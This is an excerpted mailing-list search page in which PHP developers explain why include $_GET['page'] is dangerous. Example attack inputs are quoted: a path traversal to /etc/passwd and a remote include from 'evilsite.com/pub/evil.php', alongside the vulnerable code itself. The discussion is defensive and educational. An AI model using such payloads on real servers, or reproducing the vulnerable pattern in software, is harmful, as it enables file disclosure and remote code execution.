On Wednesday 14 June 2006 21:48, Dave M G wrote:
Jochem,
::index.php
?php
include $_GET['page'];
?
Wouldn't strip_tags() eliminate the ?php ? tags that make this possible?
No, because that's not what the hole is. YOUR CODE is include $_GET['page'].
That's an easily exploitable
On Tue, June 13, 2006 9:17 pm, Dave M G wrote:
Richard Lynch wrote:
The problem with making it dynamic, is that you've just made it
AWFULLY easy for some Bad Guy to inject their own PHP file into your
system...
Think about that for awhile.
I have thought about it, and I can only see it as
No.
He's saying YOUR code is, more or less, not unlike:
?php
include $_GET['page'];
?
Maybe it's more like this:
?php
include $page;
?
Well, if at some point, you forget to initialize $page, AND IF you
have register_globals on, for some reason, perhaps even because you
later install some
Larry,
Thank you for responding.
$untrusted_var = '../../../../../../../etc/passwd';
include($untrusted_var);
Or in later versions of PHP, I *think* the following may even work:
$untrusted_var = 'http://evilsite.com/pub/evil.php';
include($untrusted_var);
I'm still not sure I see the
Dave M G wrote:
Larry,
Thank you for responding.
$untrusted_var = '../../../../../../../etc/passwd';
include($untrusted_var);
Or in later versions of PHP, I *think* the following may even work:
$untrusted_var = 'http://evilsite.com/pub/evil.php';
include($untrusted_var);
I'm still
Jochem,
::index.php
?php
include $_GET['page'];
?
Wouldn't strip_tags() eliminate the ?php ? tags that make this possible?
--
Dave M G
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
PHP List,
Up until now, in order to get all the functions and classes I need in my
scripts, I have always made a file called includes.php that contains a
series of include() statements for all of the files that I want to
include. Then I just include that one file at the top of all my PHP
At 7:22 PM +0900 6/13/06, Dave M G wrote:
PHP List,
Up until now, in order to get all the functions and classes I need in my
scripts, I have always made a file called includes.php that contains a
series of include() statements for all of the files that I want to include.
Then I just include
Anyway when you include files by script (not scpecifying the order in
which u include them) check out class inheritage and class usage in
files you include. Classes that are inherited must be included first.
Andy
At 7:22 PM +0900 6/13/06, Dave M G wrote:
PHP List,
Up until now,
The problem with making it dynamic, is that you've just made it
AWFULLY easy for some Bad Guy to inject their own PHP file into your
system...
Think about that for awhile.
On Tue, June 13, 2006 5:22 am, Dave M G wrote:
PHP List,
Up until now, in order to get all the functions and classes I
Richard Lynch wrote:
The problem with making it dynamic, is that you've just made it
AWFULLY easy for some Bad Guy to inject their own PHP file into your
system...
Think about that for awhile.
I have thought about it, and I can only see it as possible if the person
already has the ability to
On Tuesday 13 June 2006 21:17, Dave M G wrote:
If there is some other way for them to exploit a dynamic include()
function, then please let me know.
$untrusted_var = '../../../../../../../etc/passwd';
include($untrusted_var);
Or in later versions of PHP, I *think* the following may even work:
12 matches
Mail list logo
